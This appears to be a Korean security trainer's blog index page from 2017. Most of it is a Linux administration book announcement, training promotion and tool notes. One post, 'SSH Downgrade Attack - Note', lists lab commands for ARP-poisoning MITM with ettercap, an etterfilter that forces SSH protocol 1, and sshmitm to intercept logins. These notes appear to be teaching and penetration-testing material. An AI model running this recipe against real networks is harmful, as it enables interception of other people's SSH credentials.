2017.07.23 21:25

테크넷과 함께하는 엔터프라이즈 리눅스 핵심 운영 가이드 vol.1 탈고 및 출간

크리에이티브 커먼즈 라이선스
Creative Commons License



테크넷 마스터 김재벌입니다.


어쩌다 보니 , 책을 또 출간하게 되었습니다.


사실 vol.2 는 지난주에 출간되었고 , vol.1은 지난 4월에 출간되었는데 , 페이스북에 지인분들께만 소개해 드리고 딱히 블로그에 포스팅은 안했네요. (vol.2 에 대해서는 별도 포스팅하도록 하겠습니다.)


엔터프라이즈 리눅스 핵심 운영 가이드 vol.1 은 기존의 솔라리스 11으로 배우는 입문 서적에서 다룬 기초이외에 실제 리눅스 시스템을 다루어야 하는 기술에 대해서 다룹니다.


입문서적은 이 녀석 이었지요? 수정 탈고본을 반영해서 지난번에 2차 개정판이 출간되었습니다.


유닉스 & 리눅스 입문 핵심 가이드



2017년 4월에 출간된 녀석은 바로 아래 녀석이구요.


엔터프라이즈 리눅스 핵심 운영 가이드 vol.1


RHEL 이나 Oracle Linux , CentOS 7.3을 기반으로 작성되었으며, 순수 관리 내용만 다루도록 집필되었습니다.


아무래도 기존 서적들이 대부분 책 한권에 너무 많은 내용을 넣다 보니 , 실무에서 필요로하는 기술을 다루지 않은 서적이 너무 많고 , 세상은 클라우드로 가는데 , 여전히 APM 만 설치하는 책들이 대다수더군요.

해당 서적은 "레드햇 공인 교육센터인 저희 회사 주)노브레이크의 공인 강사진이 직접 집필한 만큼 책의 내용과 실무중심이라는 점은 보장해 드릴 수 있겠네요. ^^"


집필진이 모두 RHCSA / RHCE 인증을 보유하고 있고 RHCI  자격인증을 보유하고 있으니까요.

레드햇 공인 교육과정이 궁금하신 분들은 http://www.nobreak.co.kr 를 방문하고 문의 주시면 됩니다.



어찌어찌해서 출간했으니 많은 관심과 사랑 부탁 드리겠습니다. ^^


아래는 서점들은 물론 일반 서점과 기타 인터넷 서점에서도 구하실 수 있습니다.



예스24

http://www.yes24.com/24/goods/38924842?scode=032&OzSrank=2


교보문고

http://www.kyobobook.co.kr/product/detailViewKor.laf?ejkGb=KOR&mallGb=KOR&barcode=9788996376064&orderClick=LAG&Kc=








목차


Chapter 1. 사용자 및 그룹 관리 
1.1 사용자 및 그룹 정보 파일 
1. 사용자와 그룹 파일 
1.2 사용자 및 그룹 관리 
1. 사용자 생성 
2. 사용자 정보 수정 
3. 사용자 삭제 
4. 그룹 생성 
5. 그룹 정보 수정 
6. 그룹 삭제 
7. 사용자 및 그룹 관리 파일 
1.3 사용자 전환 
1. su 명령으로 사용자 전환 
2. sudo 
1.4 사용자 패스워드 속성 
1. 해시 패스워드 생성 
2. 패스워드 속성 변경 


Chapter 2. 고급 권한 관리 
2.1 확장 권한 
1. 확장 권한의 종류
2. 확장 권한 설정 
2.2 접근 제어 리스트 (Access Control List) 소개 
1. 접근 제어 리스트(ACL) 적용 유무 확인 
2. 접근 제어 리스트(ACL) 정보 확인 
3. 접근 제어 리스트의 마스크(ACL mask) 
4. 기본 접근 제어 리스트(Default ACL) 
2.3 접근 제어 리스트(ACL) 설정 
1. 접근 제어 리스트(ACL)의 권한 추가 또는 변경 
2. 접근 제어 리스트(ACL) 제거 
3. 접근 제어 리스트(ACL) 재귀적 사용 


Chapter 3. 작업 스케줄링 
3.1 단일성 작업 예약 
1. at 명령 사용 
3.2 주기적인 작업 예약 
1. crond 데몬 
2. crontab 명령 사용 
3. 시스템 작업 예약 


Chapter 4. 디스크 관리 
4.1 디스크 기본 구조 
1. 디스크의 물리적인 구조 
2. 물리적 디스크의 동작 방식 
3. 디스크 플래터(Disk Platter)의 논리적인 구성요소 
4. 디스크 파티션 (Disk Partition) 
4.2 디스크 이름 및 확인 
1. 디스크 연결 인터페이스 방식 
2. 리눅스 시스템 스토리지 장치명 
3. 핫 플러깅(Hot Plugging) 장치 인식 명령 
4.3 하드디스크 파티셔닝 
1. 디스크 파티셔닝 도구 소개
2. 각 도구별 사용법 
3. 파티션 설정 시 주의사항 
4. 확장 파티션 


Chapter 5. 파일시스템 및 스왑 메모리 
5.1 리눅스 파일시스템 소개 
1. 리눅스 파일시스템 소개 
2. 주요파일시스템구조 
5.2 파일시스템 관리 
1. 파일시스템 생성 
2. 파일시스템 마운트 
5.3 스왑 메모리 
1. 가상 메모리 소개 
2. 스왑 영역 구성 


Chapter 6. 논리 볼륨(Logical Volume) 관리 
6.1 논리 볼륨(Logical Volume) 소개 
1. 물리 볼륨(Physical Volume) 
2. 볼륨 그룹(Volume Group) 
3. 논리 볼륨(Logical Volume) 
6.2 논리 볼륨(Logical Volume) 생성 
1. 물리 볼륨을 생성하기 위한 파티션 생성 
2. 물리 볼륨(Physical Volume) 생성 
3. 볼륨 그룹(Volume Group) 구성 
4. 논리 볼륨(Logical Volume) 생성 
5. 씬 프로비저닝 구성 
6.3 논리 볼륨(Logical Volume) 요소 확인 
1. 물리 볼륨 상태 확인 
2. 볼륨 그룹 상태 확인 
3. 논리 볼륨 상태 확인 
4. 물리 볼륨, 볼륨 그룹, 논리 볼륨의 간단한 정보 확인 
6.4 볼륨 그룹(Volume Group) 및 논리 볼륨(Logical Volume) 관리
1. 볼륨 그룹 관리 
2. 논리 볼륨 관리 


Chapter 7. Systemd 
7.1 systemd 소개 
1. systemd 소개 
2. systemd 기능 및 특징 
7.2 systemd 유닛 
1. systemd 유닛 파일 위치 
2. systemd 유닛 파일의 구성 
3. systemd 유닛의 종류 
7.3 systemctl 사용 
1. 시스템에서 존재하는 다수의 systemd 유닛 확인 
2. 유닛의 개별 상태 확인 
3. systemd 유닛 제어 명령 


Chapter 8. 로그 관리 
8.1 로그 아키텍처 (Log Architecture) 
1. 로그 관리 데몬 
2. 로그 파일 위치 
3. 로그 파일의 순환 
8.2 rsyslogd 
1. /etc/rsyslog.conf 
2. 필터(Filter) 
3. 행동(Action) 
8.3 systemd-journald 
1. journalctl 사용 
2. 저널(journal) 데이터의 영구적 저장 


Chapter 9. 리눅스 부트 프로세스 
9.1 리눅스 시스템 부팅 절차 
1. init 프로세스 부팅 절차
2. systemd 부팅 절차 
3. systemd 종료 
9.2 systemd 타겟 유닛 (Target Unit) 
1. systemd 타겟 유닛(Target Unit)과 런 레벨(Run Level) 
2. 사용자가 사용 가능한 타겟 유닛 
3. 타겟 유닛 제어 
9.3 root 패스워드 복구 
1. 부트 로더(Boot Loader)에서 부팅할 커널항목 선택 
2. 선택된 커널 항목 편집 
3. 루트 파일 시스템 읽기쓰기(read-write)로 다시 마운트 
4. root 패스워드 지정 
5. 자동 레이블(label) 부여 파일 생성 
9.4 파일시스템 문제 복구 
1. 유효하지 않은 UUID 값 또는 존재하지 않은 파티션 이름을 지정할 경우 
2. 존재하지 않은 마운트 포인트를 지정할 경우 
3. 파일시스템 유형이 일치하지 않을 경우 
4. 잘못된 마운트 옵션을 지정할 경우 


Chapter 10. 소프트웨어 패키지 
10.1 RPM(Redhat Package Manager)을 사용하여 패키지 관리 
10.2 YUM(Yellowdog Updater Modified)을 사용하여 패키지 관리 
1. YUM 저장소(리포지토리, repository) 
2. YUM 패키지 정보 확인 
3. YUM 패키지 설치 
4. YUM 패키지 업데이트 
5. YUM 패키지 제거 
6. YUM 그룹 패키지 
7. 패키지 설치 기록 


Chapter 11. 네트워크 관리 
11.1 네트워크 정보 확인 
1. IP 정보 확인 
2. ifconfig 명령 사용 
3. 라우팅 테이블 확인 
4. 네트워크 연결 확인 
11.2 네트워크 관리자(NetworkManager) 소개 
1. 네트워크 관리자(NetworkManager) 
2. 레거시(Legacy) 네트워크 구성 
11.3 네트워크 관리자(NetworkManager) 도구 활용 
1. nmcli 사용 
2. nmtui 사용 
3. nm-connection-editor 사용 
11.4 호스트이름(hostname) 설정 
1. 호스트이름 분류 
2. hostnamctl 명령 사용 


Chapter 12. OpenSSH(Open Secure Shell) 
12.1 OpenSSH(Open Secure Shell) 소개 
1. OpenSSH 배경 
2. 원격 접속에 사용되는 도구 
3. SSH 연결 과정 
4. ssh 명령 사용 
12.1 OpenSSH(Open Secure Shell) 소개 
1. OpenSSH 배경 
2. 원격 접속에 사용되는 도구 
3. SSH 연결 과정 
4. ssh 명령 사용 
12.2 OpenSSH(Open Secure Shell) 설정 파일 
1. OpenSSH의 구성 파일 위치 
2. OpenSSH 서버 설정 
3. 로그관련 설정 
4. 인증 관련 설정 
12.3 OpenSSH(Open Secure Shell) 키 기반 인증 
1. 키 파일 생성 
2. 키 파일 복사 
3. 키 파일 확인
12.4 원격 파일 전송 
1. scp(Secure Copy) 명령 사용 
2. sftp(Secure File Transfer Protocol) 명령 사용 


Chapter 13. NTP 서버 관리 
13.1 NTP 소개 
1. NTP 동작 방식 
2. NTP 계층 구조 
13.2 chrony 서비스 
1. chronyd 385
2. /etc/chrony.conf 
3. chronyc 명령어 
4. system-config-date 
13.3 수동 시간 설정 
1. date 명령 
2. timedatectl 명령 


Chapter 14. 방화벽 관리 
14.1 방화벽 소개 
1. iptables 
2. firewalld 
14.2 firewall-config 사용법 
1. 기본 화면 
2. Option 메뉴 
14.3 firewall-cmd 사용법 
1. 상태 및 정보 확인 옵션 
2. 규칙 설정 옵션 
14.4 리치 규칙(Rich Rule) 
1. 리치 규칙 관련 옵션 
2. 기본 문법 
3. 리치 규칙 예제 


Appendix A. 엔터프라이즈 리눅스 서버 설치 
A.1 Oracle VirtualBox 및 CentOS 7 최신버전 다운로드 
1. Oracle VirtualBox 다운로드 
2. CentOS 7 다운로드 
A.2 Oracle VirtualBox 설치 및 가상 컴퓨터 생성 
1. Oracle VirtualBox 설치 
2. 가상 컴퓨터 생성 
3. 가상 컴퓨터 설정 
A.3 CentOS 7 설치 
1. 설치 메뉴 선택 
2. 환경 설정 
A.4 Redhat Enterprise Linux 과 Oracle Linux 다운로드 
1. Redhat Enterprise Linux 다운로드 
2. Oracle Linux 다운로드 


APPENDIX B. 아마존 리눅스 
B.1 아마존 리눅스(Amazon Linux) 란? 
B.2 아마존 리눅스(Amazon Linux) 주요 기능 
1. AWS 통합 
2. 안전한 구성 
3. 패키지 리포지토리 접근 
4. AWS 지원 
B.3 아마존 리눅스(Amazon Linux)와 RHEL/CentOS/OL 의 차이점

저작자 표시 비영리 변경 금지
신고
Trackback 0 Comment 0
2017.07.16 21:20

comae.io 메모리 분석 도구 모음 ( dumpit ) 포함

크리에이티브 커먼즈 라이선스
Creative Commons License

안녕하세요 테크넷 마스터 김재벌 입니다..^^



침해사고 대응을 위해서 다양한 도구가 활용되는데 , 그중에 메모리 포렌식을 위해 메모리 덤프는 필수적이죠.


그중에 널리 사용되는것이 moonsols 의 dumpit 인데 , 어느날 찾아보니 , 사이트가 리뉴얼 되고 툴 구하는게 어려워져서 저도 가지고 있는 버전만 활용했었습니다.


그런데 , moonsols 가 아래 사이트로 변경되고 툴도 세트 형태로 나오더군요.


https://my.comae.io/login



해당 도구를 다운 받기 위해서는 회사 메일이 있어야만 가능하고 , 인증 메일로만 로그인도 가능해서 공부하시는 분들이 활용하기에는 어려워 보여서 아예 다운 받아서 공유해 둡니다.


dumpit 이외에도 Bin2DMP.exe , DMP2Bin.exe , Hibr2Bin.exe 가 추가 되었네요.



기능이 다양해 지고 메모리 분석을 위해서 활용도가 많아졌네요.



Comae-Toolkit-Light-3.0.20170620.1.zip



 

저작자 표시 비영리 변경 금지
신고
Trackback 0 Comment 0
2017.07.15 19:47

레드햇 공인 교육 및 시험센터 - 노브레이크 부설 교육센터

크리에이티브 커먼즈 라이선스
Creative Commons License

테크넷 마스터 김재벌입니다.


어쩌다 보니 , 우리 회사가 벌써 레드햇 공인 교육센터 http://www.nobreak.co.kr/ 를 운영한지 2년이 후딱 갔네요.


저희 회사 홈페이지 입니다..  나중에 개편이 좀 필요하긴 할것 같은데...^^


오늘의 포스팅은 교육 파트에 대한 그것도 레드햇공인교육 관련 주제만 다룰 예정이라..추가적인 포스팅은 별도로 진행하겠습니다.






그동안 대기업 고객 , 공공기관 , 오픈소스 관련 기업, 학생들을 대상으로 정신없이 교육이 진행된 것 같네요.

거의 쉴틈 없이 일년내내 교육이 진행이 되었습니다.


저희 회사는 보안 컨설팅 / 교육컨설팅을 주력으로 하고 있습니다.  법인 설립은 2012년도에 했으니, 5년차 이구요.


다양한 기업/교육기관에 강사 파견과 교육/보안컨설팅 , 연구과제를 수행하고 있습니다.


보안컨설팅은 주로 취약점 점검/ 모의해킹 / 침해사고 분석 서비스를 제공하고 있구요.


암튼..


국내에서는 유일하게 레드햇 공인센터를 운영하고 있습니다.




최근에 아카데미(학생)대상 기관이 추가되긴 했지만..^^ 저희는 기업과 기관은 물론 아카데미 사업도 진행하고 있고 , 시험장도 운영하고 있는 유일한 기관이죠.


기업 및 공공기관을 대상으로 교육을 진행하고 있고 , 레드햇 코리아 사이트를 통해 등록하시면 저희 센터에서 수업을 들으시게 됩니다.


교육관련해서 레드햇 리눅스는 기본이고 JBOSS , 글러스터 스토리지 ,  Ceph 스토리지 , Ansible , 최신 버전의 오픈스택 , 오픈시프트까지 전체 포트폴리오를 아우르고 있고 , 이에 대한 교육 또한 저희 센터에서만 가능하지요.


그리고 , 무엇보다 시험을 보셔야 하는데 , RHCSA 나 RHCE는 물론 , 개별 자격증 취득 역시 저희 센터에서만 응시 가능하세요.


타 기관에서 교육을 들으셨다고 해도 저희 기관에서만 시험 응시가 가능하시고 , 실습형으로 시험을 보셔야 합니다.


레드햇 교육 서비스는 "https://www.redhat.com/ko/services/training/all-courses-exams" 여기서 확인이 가능하시고 , 등록은  http://www.nobreak.co.kr/ 에 있는 연락처나 사이트로 연락을 주시면  됩니다.


저도 공인강사 인증을 받아서,  컨설팅 때문에 자주는 아니더라도 종종 강의를 진행하고 있습니다.


제가 딱히, 이러한 부분에 홍보성 글을 올려 드리는 적은 없는데 , 올려 드리는 이유는......????



^^ , 제가 리눅스 관련  책을 몇권 출간 했기 때문입니다.


그와 관련하여 다양한 포스팅은 추가 진행토록 하겠습니다.


아울러 , RHCSA 나 RHCE 외에도 추가로 관련한 글을 올려 드리도록 하겠습니다.


그럼~



저작자 표시 비영리 변경 금지
신고
Trackback 0 Comment 0
2017.07.05 15:27

MITMF 를 이용한 공격 기법 - 파일 다운로드

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
2017.07.04 13:40

SSH Downgrade Attack - Note

크리에이티브 커먼즈 라이선스
Creative Commons License

================================================

A client  (putty가 있는 xp)

Putty.exe 실행 --> SSH를 이용 192.168.30.192(server 접속)

=================================================

공격자 셋팅

1. 첫번째 터미널

 #echo "1" > /proc/sys/net/ipv4/ip_forward

 #cat /proc/sys/net/ipv4/ip_forward  (반드시 1로 셋팅되어야 한다.)


2. 두번째 터미널

 #cat > sshdown.ecf

 if ( search(DATA.data, "SSH-1.99") )

 {

  replace("SSH-1.99","SSH-1.5");

 }

 (ctrl + d 를 동시에 눌러 저장)


 #etterfilter -o sshdown.ef sshdown.ecf


 #ettercap -T -M arp -F sshdown.ef /192.168.30.30/ /192.168.30.192/


3. 세번째 터미널

 #sshmitm -d -I -p 22 192.168.30.192

=================================================



저작자 표시 비영리 변경 금지
신고
Trackback 0 Comment 0
2017.07.04 10:50

패킷 분석-1

크리에이티브 커먼즈 라이선스
Creative Commons License



challengescan.pcapng



저작자 표시 비영리 변경 금지
신고

'OS & network > network' 카테고리의 다른 글

패킷 분석-1  (0) 2017.07.04
cisco catalyst switch guide  (0) 2010.05.31
802.11n 소개.  (0) 2010.01.02
Top 11 packet sniffer  (0) 2009.12.06
Trackback 0 Comment 0
2017.07.03 15:00

MITMf 를 이용한 패스워드 도청

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
2017.07.02 16:57

메모리 카빙 및 패킷 분석

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
2017.06.14 17:23

이터널블루 및 메타스플로잇 연동 모의공격 #1

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
2017.05.05 00:47

버추얼박스 5.1.22 릴리즈 [ 4월 28일 ]

크리에이티브 커먼즈 라이선스
Creative Commons License

버추얼박스가 5.1.22로 급하게 업데이트가 되었어요...


5.1.20 릴리즈에서 몇가지 버그가 있었는데 , 실행이 안되는 버그들이 있어서 추가 업데이트가 급하게 진행된 듯 합니다.


참고하시길.




This is a maintenance release. The following items were fixed and/or added:

  • VMM: fixed VERR_IEM_INSTR_NOT_IMPLEMENTED Guru Meditation under certain conditions (5.1 regression; mostly Mac OS X hosts; bugs #15693#15801#16274#16569#16663)
  • VMM: fixed software virtualization on Solaris hosts (5.1.20 regression)
  • Storage: fixed a potential hang under rare circumstances (bug #16677)
  • Storage: fixed a potential crash under rare circumstances (asynchronous I/O disabled or during maintenance file operations like merging snapshots)
  • Linux hosts: make the ALSA backend work again as well as loading the GL libraries on certain hosts (5.1.20 regression; bugs #16667#16693)
  • Linux Additions: fixed mount.vboxsf symlink problem (5.1.20 regression; bug #16670)

virtualbox에 대한 이미지 검색결과

저작자 표시 비영리 변경 금지
신고
Trackback 0 Comment 0


티스토리 툴바